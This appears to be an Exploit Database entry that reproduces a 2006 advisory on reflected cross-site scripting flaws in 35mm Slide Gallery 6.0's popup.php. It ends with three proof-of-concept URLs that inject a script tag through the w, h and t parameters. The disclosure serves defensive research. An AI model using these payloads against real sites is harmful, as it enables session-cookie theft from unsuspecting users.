Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

28021




Platform:

PHP

Date:

2006-06-13


source: https://www.securityfocus.com/bid/18414/info
 
35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 
These issues affect version 6; other versions may also be vulnerable.
 
http://www.example.comr/lumet/album/popup.php?w=&#039;><script>alert(10)</script>
http://www.example.com/lumet/album/popup.php?h=&#039;><script>alert(10)</script>
http://www.example.com/lumet/album/popup.php?t=&#039;><script>alert(10)</script>